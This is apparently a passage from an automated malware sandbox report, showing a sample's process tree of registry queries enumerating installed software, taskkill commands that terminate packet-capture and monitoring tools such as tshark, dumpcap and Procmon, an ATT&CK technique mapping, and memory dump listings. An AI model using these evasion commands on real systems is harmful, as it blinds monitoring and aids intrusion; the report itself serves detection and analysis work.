    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1960
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1624
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:1568
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1080
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1500
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:64
    3⤵
    PID:1944
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:32
    3⤵
    PID:760
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1064
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    PID:1920
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:1492
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2040
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    PID:1936
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:1884
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1424
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    PID:1816
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:1944
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1928
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:64
    3⤵
    PID:1652
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:32
    3⤵
    PID:1492
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1796
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:700
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    PID:1400
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1816
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:64
    3⤵
    PID:772
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:32
    3⤵
    PID:928
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1900
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1960
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:772
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:760
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1884
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:368
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:1944
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1900
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:760
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:772
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1652
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:1484
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:760
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1492
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:772
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:760
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1484
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:368
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:772
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2056
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:2068
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:2080
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2092
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:64
    3⤵
    PID:2104
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:32
    3⤵
    PID:2116
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2128
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:64
    3⤵
    PID:2140
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:32
    3⤵
    PID:2152
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2164
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:64
    3⤵
    PID:2176
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:32
    3⤵
    PID:2188
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2200
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:2212
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    PID:2224
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2236
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:2248
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    PID:2260
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2272
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:2284
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    PID:2296
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2308
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2356
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2404
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2452
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2500

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2040-119-0x000000001AC80000-0x000000001AC81000-memory.dmp

Filesize
4KB

Download
memory/2040-205-0x0000000002760000-0x0000000002761000-memory.dmp

Filesize
4KB

Download
memory/2040-206-0x0000000002770000-0x0000000002771000-memory.dmp

Filesize
4KB

Download
memory/2040-117-0x0000000001F90000-0x0000000001F91000-memory.dmp

Filesize
4KB

Download
memory/2040-186-0x0000000002800000-0x0000000002801000-memory.dmp

Filesize
4KB

Download
memory/2040-33-0x000007FEF60B0000-0x000007FEF6A9C000-memory.dmp

Filesize
9.9MB

Download
memory/2040-127-0x0000000002420000-0x0000000002421000-memory.dmp

Filesize
4KB

Download
memory/2040-140-0x0000000002450000-0x0000000002451000-memory.dmp

Filesize
4KB

Download
memory/2040-179-0x0000000002510000-0x0000000002511000-memory.dmp

Filesize
4KB

Download